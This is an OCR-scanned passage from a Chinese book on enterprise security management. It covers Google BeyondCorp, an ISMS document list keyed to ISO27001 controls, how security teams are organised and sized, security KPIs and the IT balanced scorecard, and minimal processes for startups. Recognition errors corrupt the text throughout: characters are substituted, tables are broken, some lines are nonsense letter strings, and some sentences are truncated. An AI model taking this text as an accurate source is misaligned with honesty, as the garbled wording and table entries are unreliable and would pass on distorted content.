这 种 访问 模式 要 求 客户 端 是 受 控 的 设备 ， 并 且 需 要 用 户 证 书 来 访 
问 。 访 问 有 通过 认证 服务 器 、 访 问 代 理 以 及 单 点 登录 等 手段 ， 由 访问 
控制 引擎 统一 管理 ， 不 同 用 户 、 不 同 质 源 有 不 同 的 访问 权限 控制 ， 对 
于 用 户 所 处 位 置 则 没有 要 求 。 也 束 是 说 ， 无 论 用 户 在 Google 办 公 大 
楼 、 咖 啡 厅 还 是 在 家 ， 都 是 一 样 的 访问 方式 ， 过 去 从 外 网 访问 需要 的 
VPN 已 经 被 废弃 。 而 所 有 员工 到 企业 应 用 的 连接 都 要 进行 加 密 ， 包 括 
在 办 公 大 楼 里 面 的 访问 。 可 以 说 ，Google 的 这 种 模式 已 经 彻 抵 打破 了 
内 外 网 之 别 。 


总 之 ， 办 公 系 统 上 云 、 办 公 移 动 化 、 边 界 模 糊 化 ， 这 种 方式 并 不 
只 是 技术 上 的 转变 ， 对 信息 安全 管理 也 有 不 小 的 挑战 。 目 前 对 于 绝 大 
多 数 互 联网 公司 ， 如 果 你 没有 一 文 专门 的 团队 用 于 内 部 IT 管理 ， 像 生 
产 网 络 的 基础 以 构 那样 走 上 目 全 之 路 ， 那 么 这 个 方案 也 仅仅 是 供 你 满 
足 一 下 眼球 而 已 。 


很 多 人 在 看 到 这 条 新 闻 时 ， 断 言 " 内 网 ”已 经 没有 存在 的 意义 ， 其 
实 这 里 还 是 要 加 个 范围 ，Google 目 前 也 只 十 对 办 公 网 络 这 样 做 ， 还 未 
宣称 对 生产 网 络 动 刀子 ， 所 以 生产 网 络 和 办 公 网 络 应 该 还 是 两 种 不 同 
风格 的 安全 管理 模式 。 


12.11 技术 之 外 


办 公 网 络 中 的 安全 问题 ， 因 为 涉及 “人 ”的 因素 非常 多 ， 仅 靠 技术 
手段 不 能 完全 解决 ， 这 种 感觉 比 生 产 网 络 更 严重 ， 即 单纯 依靠 技术 能 
解决 问题 的 占 比 更 低 。 束 算 你 什么 方案 都 有 ， 人 和 偏偏 有 个 技术 好 一 点 的 
程序 员 狐 了 个 调试 右 把 HIPS 进 程 干 挤 了 ， 你 气 怖 的 跑 过 去 也 不 能 说 
哈 ， 人 家 要 用 调试 器 十 正 常 需求 ， 人 家 还 会 说 “ 噶 ， 你 们 选择 的 安全 产 
品 也 不 咋 地 嘱 ” 或 者 坏 一 点 的 干脆 洲 作 什么 都 没 干 的 样子 。 用 内 行人 的 
说 法 ， 很 多 解决 方案 其 实 是 防 君 子 不 防 小 人 的 ， 所 以 制订 “信息 安全 管 
理 制度 ”也 十 必须 的 ， 它 应 该 在 新 员工 入 职 培 训 期 间 束 根植 于 雇员 的 意 
识 中 。 在 办 公 网 络 安全 这 个 问题 上 ， 技 术 和 管理 的 比重 对 半 开 ， 两 手 
都 要 抓 ， 两 手 都 要 便 。 


Citrix 
http://www. citrix.com.cn/products/xendesktop/overview.html 
Google beyondCorp 


https://static.googleusercontent.com/media/research.google.com/en/us/ 


pubs/archive/43231.pdf 
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安全 管理 体系 类 似 于 项 目 管理 的 PMBOK， 本 质 上 是 一 种 方法 论 和 
参考 维度 ， 履 盖 组 织 全 部 的 技术 活动 和 全 生命 周期 。 从 高 层 管理 的 角 
度 看 ， 仍 然 属于 组 织 技术 性 活动 的 方法 ， 仍 然 算是 个 “技术 活 ”。 


在 理论 篇 里 提 到 过 安全 管理 体系 是 一 个 随 业 务 扩 张 而 逐渐 完善 的 
过 程 ， 并 不 是 一 上 来 就 套 一 个 大 而 全 的 安全 体系 。 男 一 方面 也 与 组 织 
的 文化 有 关 ， 在 比较 松散 的 非 流程 型 的 组 织 里 过 度 强调 管理 措施 也 会 
遭 到 抵触 行为 。 


过 去 的 管理 咨询 服务 通常 是 这 样 的 ， 履 盖 ISO27001 的 ISMS 对 大 多 
数组 织 来 说 是 足够 的 ， 但 咨询 服务 的 问题 可 能 类 似 于 麦肯锡 做 咨询 一 
样 ， 理 论 都 对 ， 但 本 地 化 的 实践 还 需要 一 个 因地制宜 的 过 程 。 另 一 方 
面 国际 标准 代表 的 是 : 普遍 适用 场景 下 的 最 佳 实践 ， 不 代表 在 某 个 具 
体 场景 下 的 最 佳 实践 ， 所 以 当 企 业 自 身 认为 局 部 进入 某 个 领域 的 最 住 
实践 的 时 候 就 可 以 把 那些 参考 物 扔 掉 ， 这 并 不 是 说 对 国际 标准 毫 无 认 
知 的 人 可 以 对 此 噬 之 以 鼻 ， 仅 仅 对 跨 过 那 道 坎 的 人 才 有 现实 意义 。 


表 13-1 取 自 过 去 的 ISMS (信息 安全 管理 体系 ) 咨询 ， 主 要 是 根据 
BS17799 的 内 容 做 安全 管理 规划 。 


表 13-1 ISMS 文 件 列表 


文件 类 别 
1. 适用 性 声明 
2.ISMS 手册 


A.05 信息 安全 策略 


A.06 信息 安全 组 织 


A.07 资产 管理 


A.08 人 力 资源 安全 


A.09 物理 与 环境 安全 


A.10 通信 与 操作 管理 


文件 名 称 
XXX ISMS 适用 性 声明 


XXXISMS 手册 


信息 安全 策略 管理 指南 


规章 制度 维护 制度 


信息 安全 规章 制度 审阅 更 新 记录 
信息 安全 组 织 管理 指南 


| 


信息 安全 组 织 体系 


外 部 机 构 (权力 机 构 、 行 业 协 会 、 服 
务 商 ) 联络 表 


资产 管理 指南 
数据 安全 策略 


公司 秘密 保护 管理 规定 
人 力 资源 安全 管理 指南 


安全 培训 管理 制度 
安全 培训 教育 策略 
公司 培训 考核 记录 
培训 请 假 单 
培训 缺勤 人 员 记 录 表 


物理 与 环境 安全 管理 指南 


办 公 区 安全 管理 制度 
机 房 安全 管理 制度 
机 房 环境 管理 规范 
物理 安全 策略 


(临时 来 访 者 ) 进入 机 房 协议 


机 房 出 入 登记 记录 
机 房 定期 检查 表 


3 
> 


机 房 门禁 系统 日 志 审核 记录 


机 房 准 入 人 员 记 录 
来 访客 人 登记 表 
门禁 卡 用 户 记录 


外 来 工作 人 员 使 用 公司 资源 申请 表 


通信 与 操作 管理 指南 
病毒 防护 管理 制度 
管理 员 审 计 管理 制度 
日 志 审 核 管 理 制 度 


数据 备份 恢复 管理 制度 


安全 审计 策略 
病毒 防护 策略 


文件 编号 
ISMS-SOA 
ISMS-MAN 
ISMS-MG-A.05-01 
ISMS-MP-A.05-01 
ISMS-TR-A.05-01 
ISMS-MG-A.06-01 
ISMS-MP-A.06-01 
ISMS-MP-A.06-02 


ISMS-MG-A.07-01 
ISMS-MP-A.07-01 
ISMS-MP-A.07-02 
ISMS-MG-A.08-01 
ISMS-MP-A.08-01 
ISMS-MP-A.08-02 
ISMS-TR-A,08-01 

ISMS-TR-A.08-02 
ISMS-TR-A.08-03 

ISMS-MG-A.09-01 
ISMS-MP-A.09-01 
ISMS-MP-A.09-02 
ISMS-MP-A.09-03 
ISMS-MP-A.09-04 
ISMS-MP-A.09-05 
ISMS-TR-A.09-01 

ISMS-TR-A.09-02 
ISMS-TR-A.09-03 
ISMS-TR-A.09-04 
ISMS-TR-A.09-05 

ISMS-TR-A.09-06 
ISMS-TR-A.09-07 
ISMS-MG-A.10-01 
ISMS-MP-A.10-01 
ISMS-MP-A.10-02 
ISMS-MP-A.10-03 
ISMS-MP-A.10-04 
ISMS-MP-A.10-05 
ISMS-MP-A.10-06 


( 续 ) 


EE AE 


计算 机 病毒 问题 处 理 纪录 ISMS-TR-A.10-09 

ISMS-TR-A.10-10 

临时 中 断 公司 资源 使 用 能 力 纪 录 ISMS-TR-A.10-11 

A.10 通信 与 操作 管理 ISMS-TR-A.10-12 


数据 库 系 统 访问 修改 操作 记录 ISMS-TR-A.10-13 
ISMS-TR-A.10-14 
新 人 网 .临时 设备 防 病毒 软件 安装 登记 | ISMS-TR-A.10-15 
纪录 
严重 病毒 预警 通告 纪录 ISMS-TR-A.10-16 
ISMS-TR-A.10-17 
ISMS-TR-A.10-18 
ISMS-TR-A.10-19 
ISMS-TR-A.10-20 
ISMS-TR-A.10-21 
ISMS-TR-A.10-22 
主机 操作 系统 日 志 审 核 记 录 ISMS-TR-A.10-23 
ISMS-MG-A.11-01 
ISMS-MP-A.11-02 
ISMS-MP-A.11-03 
ISMS-MP-A.11-05 
ISMS-MP-A.11-06 
A.11 访问 控制 ISMS-TR-A.11-01 
ISMS-TR-A.11-02 
操作 系统 普通 权限 账号 记录 ISMS-TR-A.11-03 
ISMS-TR-A. 11-04 
第 三 方 远程 接 人 系统 用 户 审批 记录 ISMS-TR-A.11-05 
系统 测试 记录 ISMS-TR-A.11-06 
系统 管理 员 用 户 帐 号 权限 授权 记录 ISMS-TR-A.11-07 


(4%) 

文件 类 别 文件 名 称 文件 编号 
系统 临时 帐号 回收 禁用 记录 ISMS-TR-A.11-08 
系统 临时 帐号 申请 记录 ISMS-TR-A.11-09 
系统 用 户 帐号 登记 记录 ISMS-TR-A.11-10 

A> Ry Agia 5 ‘ -TR-A.11- 
A11 访问 控制 系统 帐号 口令 检查 记录 ISMS-TR-A.11-11 
系统 帐号 口令 修改 记录 ISMS-TR-A.11-12 

HZ 号 


ISMS-TR-A.11-13 
ISMS-TR-A.11-14 
ISMS-TR-A. 11-15 
信息 系统 的 获取 、 开 发 和 维护 管理 指南 | ISMS-MG-A.12-01 
ISMS-MP-A.12-01 
ISMS-MP-A.12-02 
应 用 系统 软件 开发 管理 制度 ISMS-MP-A.12-03 
ISMS-MP-A.12-04 
ISMS-MP-A.12-05 
ISMS-MP-A.12-06 
A12 信息 系统 的 获取 、 开 发 和 维护 系统 变更 需求 申请 表 ISMS-TR-A.12-01 


系统 重大 操作 登记 记录 ISMS-TR-A.12-02 
察 报告 


ISMS-TR-A.12-03 
ISMS-TR-A.12-04 
ISMS-TR-A.12-05 
应 用 系统 上 线 操 作 步 又 记录 表 ISMS-TR-A.12-06 
应 用 系统 上 线 流程 记录 表 ISMS-TR-A.12-07 
ISMS-TR-A.12-08 
信息 安全 事故 管理 指南 ISMS-MG-A.13-01 
ISMS-MP-A.13-01 
ISMS-MP-A.13-02 
ISMS-MP-A.13-03 


A.13 信息 安全 事故 管理 应 急 安全 策略 ISMS-MP-A.13-04 
事故 事件 登记 记录 ISMS-TR-A.13-01 
事故 事件 申告 记录 ISMS-TR-A.13-02 


事故 事件 支持 人 员 联 系 表 ISMS-TR-A.13-03 
问题 分 类 汇总 月 报表 ISMS-TR-A.13-04 
业务 连续 性 管理 指南 ISMS-MG-A.14-01 
A.14 业务 连续 性 管理 —— ISMS-MP-A.14-01 


ISMS-TR-A.14-01 
AAS 符合 性 符合 性 管理 指南 ISMS-MG-A.15-01 


适用 法 律 法 规 及 其 他 要 求 一 览 表 ISMS-MP-A.15-01 


上 面 的 表格 虽然 看 上 去 有 点 过 时 ， 但 对 于 没 太 多 体系 化 思维 的 技 
术 人 员 来 说 还 是 有 参考 的 意义 。 当 你 看 ISO27001 看 的 云 里 雾 里 的 时 
候 ， 再 看 看 这 些 或 许 能 有 所 启发 。 


13 工 相对“ 全集 ” 


这 里 所 说 的 全 集 其 实 算 不 上 是 全 集 ， 只 是 一 个 相对 的 、 偏 实 操 的 
集合 ， 真 正 意义 上 的 全 集 引 用 了 国际 上 的 诸多 标准 、 指 南 和 最 佳 实 
践 ， 过 于 复杂 而 庞大 ， 对 初 入 安全 管理 的 人 很 容易 陷入 汪洋 大 海 找 不 
到 出 路 。 也 曾经 看 到 过 某 大 型 的 互联 网 公司 在 讲 安全 体系 ， 可 能 是 人 
看 官 觉得 自己 层次 不 够 高 ， 所 以 套 了 很 多 高 大 上 的 模型 ， 但 在 实际 工 
作 中 很 多 类 目 都 不 会 触及 。 所 以 下 面 的 这 张 图 是 站 在 安全 职能 的 角度 
看 平时 要 做 哪些 事情 ， 那 些 不 太 常 用 的 ， 或 者 比较 高 层次 的 开 治 理 的 
内 容 束 不 罗列 其 中 。 如 图 13-1 所 示 。 


安全 管理 体系 


图 13-1 信息 安全 全 集 


几 家 大 厂 套 的 都 是 SDL 的 模型 ， 这 里 并 没有 直接 引用 SDL， 还 是 以 
ITIL+SDL+SAMIM 为 骨架 ， 尽 可 能 地 结合 公司 研 运 一 体 化 的 价值 链 过 
程 ， 同 时 又 反映 出 安全 在 不 同 的 维度 分 别 做 哪些 事 。 


当然 里 面 也 有 很 多 内 容 未 放 进 去 ， 例 如 供应 链 安 全 、 外 部 开放 与 


合作 等 。 


13.2 组织 


对 于 比较 小 的 安全 团队 而 言 ， 其 实 不 需要 很 严格 的 划分 ， 甚 至 不 
需要 引入 过 分 复杂 的 团队 管理 。 进 一 步 发 展 至 20 人 规模 以 后 可 能 需要 
做 一 些 简单 的 工种 划分 。 对 于 比较 大 型 的 公司 及 平台 ， 安 全 团队 规模 
也 比较 大 ， 通 常 分 为 两 队 : 一 队 做 传统 的 攻防 对 抗 领域 ， 一 队 做 偏 于 
业务 安全 上 的 “ 风 控 ”。 图 13-2 仅 作为 组 织 划分 的 示例 ， 现 实 中 不 一 定 按 
照 这 样 分 。 


EE 

— 一 一 一 一 一 一 一 一 
| src f sase | ss E ee ee 
渠道 建设 web 安全 安全 运 维 


账号 风 控 体系 ”主要 业务 场景 ”主要 业务 场景 
RAS 之 一 的 风 控 ， 之 二 的 风 控 ， 
反 撞 库 例如 反 欺 诈 例如 交易 安全 


漏洞 收集 App 安全 网 络 安 全 
漏洞 根 因 分 析 面向 自 有 产品 系统 安全 
应 急 响应 的 安全 方案 ”体系 建设 
安全 技术 研究 SDL 的 实践 


图 13-2 ”大 型 安全 部 门 组 织 结构 图 示例 


当 安 全 团队 发 展 到 一 定 规 模 后 会 发 生 一 些 变 化 ， 团 队 小 的 时 候 基 
本 都 专注 于 安全 本 身 ， 大 都 是 做 纯 安 全 的 人 ， 到 了 一 定 规模 以 后 ， 比 
如 目 己 的 安全 产品 运营 ， 束 需要 大 数据 的 支持 ， 安 全 团队 本 身 会 引入 
产品 经 理 、 开 发 、 运 维 、DBA 等 各 种 职能 的 人 ， 使 得 它 看 上 去 像 一 条 


业务 线 。 而 风 控 本 质 上 就 是 一 个 BI 类 型 的 业务 ， 自 然 也 包括 了 研发 、 
PM、 运 维 、 数 据 分 机 、 后 侣 人工 审 核 等 各 种 各 样 的 职能 。 不 再 是 一 个 
传统 意义 上 的 由 攻防 人 员 组 成 的 安全 小 作坊 ， 对 团队 管理 者 的 要 求 也 
会 远 远 超 出 安全 本 喘 ， 最 好 是 集 安 全 、 研 发 、 运 维 视野 于 一 身 的 全 局 
FHA, RE ` MEPIS IBA, ZIMA ° 


对 于 涉及 安全 产品 自 研 的 团队 ， 可 以 独立 也 可 以 归 入 应 用 安全 和 
以 构 安 全 的 分 文 里 ， 例 如 Web 代 码 审计 和 WAF 研 发 可 以 归 入 一 组 ， 这 
一 组 既 负 责 发 现 问题 又 负责 防御 产品 ， 知 识 和 思路 上 一 脉 传 承 。 


在 团队 规模 方面 ， 目 前 国内 最 大 的 两 家 互联 网 公司 阿里 和 腾讯， 
其 安全 团队 ( 含 业 务 安全 / 风 控 ) 的 规模 大 约 在 2000 多 人 左右 (此 数据 
来 源 于 非 官方 渠道 ) ， 两 家 公司 的 员工 总 数 均 为 30000 多 人 ， 安 全 技术 
人 员 大 约 占 了 7%， 安 全 体系 内 部 ， 业 务 安全 含 风 控 团队 通常 是 攻防 的 2 
倍 以 上 。 安 全 团队 的 规模 与 业务 成 长 的 适应 性 比例 参见 表 13-2 。 


表 13-2 ”安全 团队 规模 与 业务 适应 性 比例 


业务 规模 总 人 数 攻防 类 业务 安全 类 
1 万 服务 器 60-80 20+ 40+ 
3 ~ 5 万 服务 器 120+ 30-40 80+ 
10 万 + 服务 器 200 50-60 120+ 
30 ~ 50 万 服务 器 800 ~ 1000 200+ 500+ 


安全 团队 的 规模 其 实 不 能 只 拿 IDC 的 服务 器 规模 来 衡量 ， 跟 业务 复 
杂 程 度 也 有 很 大 的 关系 ， 同 质 类 型 的 业务 多 ， 例 如 10 万 台 服 务 器 上 跑 


的 都 是 单一 产品 ， 那 安全 文 持 团 队 就 不 一 定 需 要 那么 多 人 ， 如 果 是 纶 
账号 体系 ， 没 太 多 业务 之 痛 ， 风 控 团队 的 规模 也 可 大 幅 缩 减 ， 具 体 还 
要 看 应 用 场景 。 


总 体 来 说 ， 安 全 的 组 织 结构 如 何 划分 是 一 个 比较 灵活 的 话题 ， 后 
会 在 笔者 技术 博客 中 继续 做 专题 分 享 。 


13.3 KPI 


对 于 安全 这 个 不 直接 产生 利润 的 职能 而 言 ， 其 KPI 衡量 一 直 是 业界 
难题 ， 就 像 程序 员 这 个 工种 无 法 简单 通过 单位 时 间 的 代码 行 数 和 bug 率 
来 评价 一 个 人 的 能 力 产 出 。 业 界 有 IT 平衡 计 分 卡 这 样 的 工具 提供 了 高 
纬度 的 参考 ， 如 图 13-3 所 示 。 


把 IT 部 门 映 射 到 安全 部 门 承 是 安全 管理 者 需要 考虑 的 内 容 。 在 “IT 
用 户 满意 度 ” 这 个 角度 ， 主 要 是 两 个 客户 ， 一 个 内 部 客户 ， 男 一 个 是 外 
部 客户 。 内 部 客户 是 使 用 和 依赖 安全 能 力 的 兄弟 部 门 ， 例 如 业务 线 、 
运 维 、 人 研发 等 职能 。 对 他 们 而 言 是 否 能 获得 安全 团队 的 高 质量 的 文 
持 ， 尽 可 能 不 降低 自身 的 工作 效率 ， 例 如 使 用 安全 部 门 提供 的 安全 产 
品 对 业务 系统 性 能 影响 很 低 ， 接 入 和 变更 做 到 业务 侧 “ 无 感知 ”状态 ， 
不 要 出 现 一 扫 插 束 性 能 波峰 ， 一 升级 变更 束 断 网 的 事情 。 其 实 每 一 个 
部 门 都 暗含 了 一 个 心理 ， 那 束 是 我 得 到 安全 能 力 的 时 候 不 需要 我 付出 
KE ( 线 上 变更 、 性 能 损耗 、 二 次 开发 、 多 一 道 流 程 、 繁 到 的 安装 调 
试 .……) 。 对 于 外 部 客户 ，2C 类 型 的 业务 那 就 是 线 上 的 用 户 ， 安 全 最 
大 的 需求 区 是 保障 用 户 数据 安全 ， 保 护 用 户 隐私 ， 不 损失 用 户 体 验 。 


IT 用 户 满意 度 


视角 : 用 户 如 何 看 待 IT 部 门 的 服务 
使 命 : 成 为 组 织 满意 的 IT 服务 部 门 
目标 : 

* 提供 最 佳 IT 服务 

“与 IT 使 用 部 门 建立 伙伴 关系 

“让 IT 使 用 部 门 满意 


视角 : 管理 层 怎样 评价 IT 部 门 视角 : IT 是 否 满足 未 来 发 展 挑战 
使 命 : 获得 IT 投资 的 价值 贡献 使 命 适应 未 来 发 展 机 遇 和 挑战 
目标 : 目标 : 
* 提供 IT 服务 的 业务 价值 + 保障 IT 人员 的 培训 和 教育 
“有 效 控制 IT 花费 + 提高 IT 人 员 的 专业 水 平 


。 提 高 IT 服务 支持 的 效率 。 提 高 IT 新 技术 的 研究 能 力 
IT 内 部 过 程 


视角 : IT 服务 流程 的 效果 和 效率 
使 命 : 高 效 提供 IT 产品 和 服务 
目标 : 

“提高 软件 开发 效率 


. 提高 IT 设备 运营 效率 
. 提高 IT 服务 支持 的 效率 


图 13-3 IT 平衡 计 分 卡 


在 “IT 价值 贡献 ”这 个 维度 上 成 本 很 容易 计算 ， 但 是 价值 却 比 较 难 稀 
量 。ROI 则 一 直 是 高 层 管理 者 需要 考虑 的 事情 。 这 个 业界 难题 比较 难以 
量化 ， 现 在 所 有 的 量化 都 缺乏 合理 的 立足 点 ， 比 如 检测 到 一 次 准 APT 
事件 ， 你 就 可 以 说 保护 了 整个 公司 的 资产 。 照 此 下 去 安全 部 门 都 保护 
了 公司 成 百 上 千 回 了 ， 老 板 们 应 该 每 年 给 安全 团队 发 个 超级 大 红包 才 
行 。 但 事实 上 是 否 真 的 作用 等 价 于 保护 了 整个 公司 的 资产 很 难 界定 。 
有 的 公司 为 了 避免 大 公司 病 开始 让 各 个 部 门 自负 盈亏 ， 独 立 核算 ， 开 
放 能 力 ， 公 平 竞价 ， 但 这 种 内 部 报价 和 结算 的 模式 本 质 上 都 有 点 强 买 


强 卖 的 味道 ， 不 是 真正 意义 上 的 市 场 化 行为 ， 至 少 跟 靠 完 全 的 市 场 化 
活动 来 养活 自己 的 乙方 安全 公司 比 差 很 远 ， 所 以 这 种 模式 能 激励 提升 
内 部 效率 ， 防 止 腐败 ， 但 不 能 代表 提高 了 投资 回报 率 。 虽 然 有 一 些 指 
标 可 以 衡量 安全 团队 内 部 的 工作 ， 但 对 于 安全 部 门 整体 来 说 ， 似 乎 难 
有 评价 标准 ， 诸 如 一 年 挡住 了 多 少 次 暴力 破解 ， 挡 住 了 总 量 多 少 的 

DDoS 攻击 这 些 数据 用 在 市 场 宣 传 还 可 以 ， 用 在 KPI 则 完全 没有 和 意义。 
当然 如 有 一 些 明 显 不 合格 的 评价 ， 例 如 在 和 管理 层 约定 的 时 间 内 ， 没 
有 组 建 到 足够 支撑 能 力 的 安全 团队 ， 没 有 改善 安全 事件 频 发 的 状况 ， 
基本 上 离 下 课 也 不 远 了 。 


4T 内 部 过 程 ” 这 个 维度 ， 安 全 作为 辅助 的 职能 ， 最 主要 就 是 保障 交 
付 、 运 各 等 流程 的 效率 。 风 险 和 效率 折 中 这 只 是 一 个 理论 上 的 说 法 ， 
实际 上 大 家 都 默认 安全 团队 的 作用 是 要 尽 可 能 地 规避 一 切 安全 风险 ， 
所 以 在 风险 承受 这 方面 没有 太 大 受 协 空间 的 前 提 下 ， 主 要 还 古 在 文 撑 
业务 提升 效率 ， 对 应 到 安全 工作 ， 有 几 个 方面 : 


覆盖 率 一 安全 能 力 在 公司 内 的 普及 程度 ， 有 多 少 业务 处 于 保护 
状态 ， 有 多 少 砍 色 地 市 ， 有 和 多少 没有 察觉 或 元 人 问津 ， 当 然 还 有 一 个 
很 重要 的 ， 知 道 有 风险 但 是 推 不 动 安全 策略 ， 眼 睁 睁 的 看 着 出 事 。 推 
动能 力 很 考量 软 技能 ， 男 一 方面 如 采 安 全 团队 人 力 太 少 ， 目 动 化 能 

太 低 ， 专 业 技 能 不 够 高 导致 没有 实力 文 撑 全 产品 线 的 研发 和 运营 ， 这 
个 实际 上 也 属于 安全 团队 自身 要 背负 的 责任 ， 研 发 和 运 维 没 有 在 短期 


AD ASA RWI A BET ea aE, TBE, ARES] PA 
业务 的 安全 活动 也 是 安全 团队 的 责任 ， 争 取 到 必要 的 货源 也 是 责任 之 


-覆盖 深度 一 一 对 于 一 个 应 用 系统 ， 上 线 之 前 跑 一 遇 扫 描 器 也 叫 履 
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一 样 的 ， APACE SUAVE RIRE, EMEA m KM AA 
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以 持续 优化 的 方向 。 从 源头 解决 安全 问题 其 实 是 非常 有 挑战 的 工作 ， 
尤其 在 战线 很 长 的 时 候 ， 绝 不 可 能 有 了 一 个 SDL 这 样 的 方法 论 束 能 解 


决 问题 。 


- 检 出 率 / 主 动 止 损 率 一 一 已 有 安全 机 制 对 攻击 入 侵 行为 的 有 效 检测 
K 〈 漏 报 和 误 报 ) ， 例 如 当前 线 上 的 安全 产品 和 规则 集 对 生产 环境 的 
威胁 检 出 率 为 80%， 有 20% 是 外 部 报告 或 事后 才 发 现 的 ， 那 么 我 希望 下 
一 年 这 个 指标 能 提升 到 90%， 这 束 需 要 通过 创新 技术 手段 ， 优 化 纵深 防 
御 体 系 ， 清 理 灰 色 地 融和 死角， 逐步 提升 效 末 。 


:TCO/ROI 一 一 这 是 一 个 相对 传统 的 指标 ， 比 较 容 易 理 解 ， 用 了 多 
少 资源 ， 文 撑 了 多 少 业 务 ， 支 撑 的 深入 程度 ， 达 成 的 效果 的 综合 反 
映 。 通 常 有 儿 个 层次 1. 勉强 支撑 ，2. 完 全 支撑 ，3. 支 撑 以 外 能 压榨 出 
剩余 资源 用 于 再 创新 。 勉 强 文 撑 其 实 就 是 救火 队长 的 状态 ， 完 全 文 撑 
属于 系统 化 但 不 进取 ， 只 有 第 三 种 才能 可 能 达到 业界 最 佳 实践 ， 没 有 


富余 力量 整理 思路 和 搞 研 究 的 安全 团队 永远 会 疲于奔命 。 至 于 能 不 能 
转化 为 对 外 部 服务 部 门 ， 产 生 账面 盔 利 这 个 目前 看 来 还 是 小 众 话题 。 


=H 


-技术 维度 指标 一 一 入 侵 感 知 检 出 率 、 入 侵 感 知 误 报 率 、 入 侵 感知 
反应 时 长 、 网 络 层 抗 DDOS 能 力 、 安 全 方案 伸缩 性 、 安 全 方案 可 用 性 、 
1day 调 洞 主动 发 现时 长 、 高 危 漏 洞 全 网 排查 时 长 、 高 危 漏 洞 全 网 修复 


qT 学 习 与 革新 ”的 维度 是 成 熟 的 安全 团队 才 会 考虑 的 事情 ， 大 意 是 
过 了 救火 阶段 后 ， 安 全 如 何 考虑 发 展 的 问题 。 有 几 个 方面 : 1) 向 业界 
领导 厂商 学 习 。2) 应 对 业务 的 成 长 ， 如 果 业 务 侧 的 规划 是 用 户 数 10 
倍 ， 系 统 容 量 20 倍 ， 完 成 云端 化 改造 ， 安 全 能 否 适 应 这 种 变化 。3) 应 
对 外 部 威胁 趋势 的 变化 。 攻 防 是 一 个 动态 过 程 ， 即 使 是 当下 喜 称 业界 
最 佳 实践 的 整体 框架 也 不 可 能 一 秀水 多 。 当 学 习 和 能 力 的 培养 过 度 超 
前 业务 增 速 时 ， 也 会 遇 到 一 个 问题 ， 主 营业 务 决定 安全 的 天 花 板 ， 此 
时 可 能 会 陷入 自如 上 和 目 乐 ， 这 种 问题 似 一 道 魔 光 ， 和 常年 以 来 都 无 法 解 
ae 


13.4 ”外 部 评价 指标 
从 外 部 来 评价 一 个 甲 方 的 安全 团队 通常 有 几 个 方面 的 考量 : 


攻防 能 力 一 一 如 有 果 安 全 团队 没 几 个 懂 攻 防 的 骨干 ， 那 像样 的 安全 
团队 这 件 事 就 无 从 谈 起 ， 对 攻防 的 理解 是 做 安全 的 基础 ， 业 界 普遍 的 
状况 是 整体 实力 强 的 安全 团队 攻防 能 力 必 然 不 弱 ， 而 攻防 能 力 弱 的 团 
队 其 安全 建设 必然 强 不 到 哪里 去 。 一 般 能 养 得 起 一 堆 攻 防 人 才 的 安全 
团队 预算 都 比较 充足 ， 说 明 公 司 相 对 重视 。 攻 防 技 术 在 安全 建设 中 属 
于 “ 单 太 ”技术 ， 决 定 的 是 单 点 的 殴 驭 和 深入 程度 。 


-视野 和 方法 论 一 一 单 点 技术 代表 局 部 的 执行 力 ， 但 在 影响 整个 安 
全 团队 的 产 出 因素 上 仍然 受制 于 团队 的 整体 视野 和 所 使 用 的 方法 论 。 
甲 方 的 安全 团队 并 不 是 一 个 纯 安全 研究 性 质 的 职能 ， 所 以 只 强调 攻防 
和 漏洞 是 不 足以 产生 高 ROI 的 ， 因 为 安全 建设 中 有 很 大 一 部 分 跟 具 体 
的 漏洞 不 相关 ， 跟 漏洞 缓解 和 免疫 机 制 也 不 相关 。 如 有 果 只 强调 方法 而 
不 强调 攻防 就 会 陷入 纸上谈兵 ， 但 反 过 来 只 强调 攻防 不 强调 方法 就 会 
陷入 全 员 救 火 队 的 状态 。 绿 观 业界 ， 过 于 强调 风险 管理 方法 论 的 单位 
其 解决 实际 问题 的 能 力 往 往 比较 欠缺 ， 而 一 味 强调 攻防 排 不 安全 标准 
的 团队 往往 顶层 安全 设计 有 问题 。 


工程 化 能 力 一 一 对 于 中 大 型 互联 网 公司 的 安全 建设 ， 能 否 将 单 点 
的 攻防 知识 转换 为 整个 公司 业务 全 线 防御 、 纵 深 防 御 、 目 动 化 的 能 
就 是 工程 化 。 举 个 例子 : 1) 和 攒 目 己 的 经 验 上 感染 的 机 器 查看 进程 ， 
dump 文 件 解决 的 是 单个 事件 ，2) 把 这 种 经 验 转 换 为 文档 和 脚本 能 解 
决 一 部 分 自动 化 的 问题 ， 让 更 多 的 工程 师 具备 响应 的 能 力 ，3) 更 进 一 
步 ， 如 有 果 能 将 脚本 转换 为 HIDS 部 署 在 所 有 的 服务 右上 则 相当 于 全 线 业 
务 具备 了 一 定 的 入 侵 感 知 能 力 ， 单 点 技术 强 往往 代表 1) 到 2) 没有 问 
题 ， 但 在 衡量 一 个 企业 或 平台 整体 安全 能 力 的 时 候 ， 看 的 其 实 征 3) ， 
很 多 团队 就 古 在 这 一 步 瞬 不 过 去 ， 进 而 导致 攻防 人 才 很 多 ， 但 在 整 


多 
安全 建设 上 ROI 不 高 。 


pung 


P 


-对 业务 的 影响 力 一 一 这 一 点 跟 内 部 的 影响 力 ， 跨 组 织 的 沟通 能 


力 ， 扒 动能 力 ， 团 队 视 野 有 很 大 的 关系 。 最 明显 的 特征 吏 是 安全 团队 
征 在 做 微观 、 狭 义 的 安全 还 是 做 覆 兽 面 较 大 、 广 义 的 安全 。 安 全 做 得 


最 好 的 企业 一 定 是 将 安全 和 风险 意识 根植 于 企业 文化 中 。 


13.5 “最 小 集合 


对 于 创业 型 公司 ， 不 强调 流程 的 公司 文化 中 ， 为 了 保障 全 生命 周 
期 的 安全 管理 的 实施 效 末 ， 在 流程 层面 必须 要 要 应 对 的 几 个 方面 如 
F: 


1) 建立 事前 的 安全 基线 ， 各 种 安全 编程 规范 、 运 维 配置 规范 等 。 


2) 事 中 的 发 布 & 变 更 环节 的 安全 管理 。 


3) 事后 的 救火 机 制 。 


上 面 3 条 比较 容易 理解 ， 但 是 只 有 这 3 条 显然 是 不 够 的 ， 如 果 业 务 
在 发 展 而 安全 永远 停留 在 这 个 治理 水 平 上 就 不 太 合 理 ， 所 以 必须 有 一 
些 机 制 保 证 安全 管理 的 水 平 是 与 时 俱 进 的 。 至 少 在 公司 或 安全 团队 内 
部 有 一 个 方法 能 帮助 建立 和 不 断 完善 安全 体系 本 身 。 


4) 把 救火 逐步 转化 为 防御 机 制 或 对 现 有 安全 策略 升级 的 流程 (或 
团队 意识 ) 。 


